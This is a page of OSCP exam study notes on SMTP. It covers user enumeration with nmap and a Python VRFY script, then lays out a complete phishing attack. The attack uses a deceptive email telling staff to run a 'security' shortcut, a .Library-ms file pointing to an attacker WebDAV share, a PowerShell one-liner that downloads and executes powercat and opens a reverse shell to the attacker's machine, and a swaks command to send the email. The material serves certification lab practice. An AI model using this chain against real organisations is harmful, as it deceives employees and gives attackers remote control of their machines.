📘
OSCP Exam Prep
OSCP Exam Prep
OSCP Exam Prep
  • Reference List
  • Guideline
  • Commons
    • Basic Scans
    • Service Enumeration
      • HTTP(S) (80 / 443)
      • SMB (139 / 445)
      • FTP (21)
      • DNS (53)
      • SSH (22)
      • LDAP (389/636/3268)
      • Kerberos (88)
      • SNMP (161)
      • SMTP (25)
      • RDP (3389)
      • Evil-WinRM (5985/5986)
      • MYSQL (3306)
      • MSSQL (1433)
    • Default/Common Credentials
    • Shells
      • TTY Shell
    • File Transfer
    • KeePass Database
    • Port Forwarding
    • File Metadata
  • Attacks
    • Run a command x times
    • Public Exploits
    • User Creation
    • Password Cracking
      • Using custom wordlists
    • LFI/RFI
    • SQLi
    • PwnKit
    • SAM and SYSTEM files
    • Phishing for Access (Requires MailSVR)
    • GitDumper
  • Enumeration
    • Linux
    • Windows
  • Privilege Escalation
    • Linux
    • Windows
  • Port Forwarding Extras
    • Linux
    • Windows
  • Active Directory
    • Enumeration
    • Lateral Movement
    • Privilege Escalation
Powered by GitBook
On this page
  • User enumeration
  • Automated recon script
  • Phishing attack to get a foothold
  • Preparation
  • Exploit
  1. Commons
  2. Service Enumeration

SMTP (25)

User enumeration

nmap --script smtp-enum-users.nse -p 25,465,587 <IP>

Automated recon script

python3 smtp_script.py <username> <IP>
Script:
#!/usr/bin/python 
import socket 
import sys 

if len(sys.argv) != 3:
        print("Usage: smtp_user_enum <username> <target_ip>") 
        sys.exit(0) 

# Create a Socket 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

# Connect to the Server 
ip = sys.argv[2] 

connect = s.connect((ip,25)) 
# Receive the banner 

banner = s.recv(1024) 
print(banner) 

# VRFY a user 
user = (sys.argv[1]).encode() 

s.send(b'VRFY ' + user + b'\r\n') 
result = s.recv(1024) 
print(result) 

# Close the socket 
s.close() 

Phishing attack to get a foothold

Preparation

On Kali Machine:
    Create a webshare for target machines to send files to
    /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
 
     OR
    
    wsgidav -H 0.0.0.0 -p 80 --auth anonymous -r /home/kali/beyond/webdav/
    
    Create a text file named body.txt
    Input the following email template into the text file
    
    
On Windows Machine:
    Create a text file named: config.Library-ms
    Input the following xml snippet below into the text file
    
    Create a shortcut that runs the following powershell command that initiates a reverse shell
    Transfer both files onto the Kali Machine for hosting
body.txt
Hey!
I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.

On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!

John
config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>

<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>

<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>

<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://<Kali IP></url>
</simpleLocation>

</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
automatic_configuration.lnk
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP>/powercat.ps1'); powercat -c <Kali IP> -p <Kali port> -e powershell"

Exploit

On Kali Machine:
    Have a netcat listener set up to catch the reverse shell
    Have a wsgidav server to host the automatic_configuration.lnk file
    Have a python simple server set up to host powercat, or any other payload


Send the email to target mail server and a destination email address:
    sudo swaks -t <Target EMAIL> -t <Target EMAIL> --from <Source EMAIL> --attach @config.Library-ms --server <MAILSVR IP> --body @body.txt --header "Subject: Staging Script" --suppress-data
  • Goal: Target user receive the email, and and executes the .library-ms file. Upon execution, the target machine will fetch the Powercat binary from our Kali machine, and initiate a reverse shell with us. Giving us initial foothold onto the target machine

PreviousSNMP (161)NextRDP (3389)

Last updated 3 months ago